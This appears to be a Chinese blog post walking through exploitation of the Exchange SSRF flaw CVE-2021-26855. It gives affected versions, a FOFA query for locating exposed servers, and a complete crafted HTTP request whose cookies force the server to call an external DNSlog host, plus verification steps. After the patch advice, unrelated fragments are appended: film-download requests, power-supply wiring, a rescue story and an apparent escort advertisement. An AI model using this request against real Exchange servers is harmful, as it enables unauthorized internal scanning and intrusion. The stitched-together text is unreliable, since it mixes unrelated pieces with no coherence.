Exchange Server 是微软公司的一套电子邮件服务组件,是个消息与协作系统。2021年03月3日,微软官方发布了Microsoft Exchange安全更新,披露了多个高危严重漏洞,其中:在 CVE-2021-26855 Exchange SSRF漏洞中,攻击者可直接构造恶意请求,以Exchange server的身份发起任意HTTP请求,扫描内网,并且可获取Exchange用户信息。该漏洞利用无需身份认证。
Exchange 2013 Versions < 15.00.1497.012,
Exchange 2016 CU18 < 15.01.2106.013,
Exchange 2016 CU19 < 15.01.2176.009,
Exchange 2019 CU7 < 15.02.0721.013,
Exchange 2019 CU8 < 15.02.0792.010。
fofa 搜索:app=“Exchange”(注意:互联网的非授权利用属于违法行为)
访问outlook页面
开启burp抓包,构造数据包:
GET /owa/auth/x.js HTTP/1.1 Host: IP Connection: close sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88" sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://IP/owa/auth/logon.aspx?url=https%3a%2f%2PIp%2fowa%2f&reason=0 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: X-AnonResource=true; X-AnonResource-Backend=oyq5v1vyqo5komisdc1jfltvzm5dt2.burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
访问url为:https://xxx.xxx.xxx.xxx/owa/auth/x.js(貌似x.js可以随便构造)
构造Cookie信息为:
Cookie: X-AnonResource=true; X-AnonResource-Backend=oyq5v1vyqo5komisdc1jfltvzm5dt2.burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
其中"oyq5v1vyqo5komisdc1jfltvzm5dt2.burpcollaborator.net"为dnslog信息。
可使用burp自带的dnglog进行验证:
点击burp,选择Burp collaborator client:
各个DNSLog提示信息不一样,但是都可以成功返回信息:
升级到最新安全版本
本文章仅用于交流学习,请勿使用该漏洞进行违法活动。
本文导读目录: 1、求 黑客帝国4 百度云资源,谢谢 2、求黑客帝国1080P的原版的种子,圣城家园都是中文配音版的。 3、黑客帝国1-4百度云连谢谢! 4、谁有黑客帝国的资源 5、求...
双电源供电(双电源供电与双回路供电的区别是什么?) 双回路供电是指二个变电所或一个变电所二个仓位出来的同等电压的二条线路。当一条线路有故障停电时,另一条线路可以马上切换投入使用,电气设计在线教学狄老...
CPU内存安全问题不仅仅是处理器和操作系统需要针对Meltdown和Spectre两大内存漏洞头疼的问题,同时显卡也面临着威胁。为此,NVIDIA已经开始发布更新的驱动程序,以帮助防止CPU的漏洞...
冲浪俱乐部的4名游泳好手接连被暗流卷拖导致溺水,这惊险一幕发生在7月4日的海南万宁,所幸一位67岁大爷犹如“神兵天降”,凭借高超的泳技和冷静的应对一口气救下4人! “我去海滩的时间不早不晚,很庆幸”...
北京市商务接待守候模特个人伴游在哪里【尤淑芬】 今日给大伙儿共享的內容是“北京市商务接待守候模特个人伴游在哪里【尤淑芬】”,我是尤淑芬,来源于垫江县,2020年33岁,做为岗位:女学妹平面图,我喜爱我...
1.1 组件称号随机化第一种技能是一个陈旧的被称为“跨协议脚本”的技能,2001年宣布的论文详细描述了此进犯,但要害的是无论是Redis仍是Memcached都有一个简略的根据行的协议,而且疏忽任何无...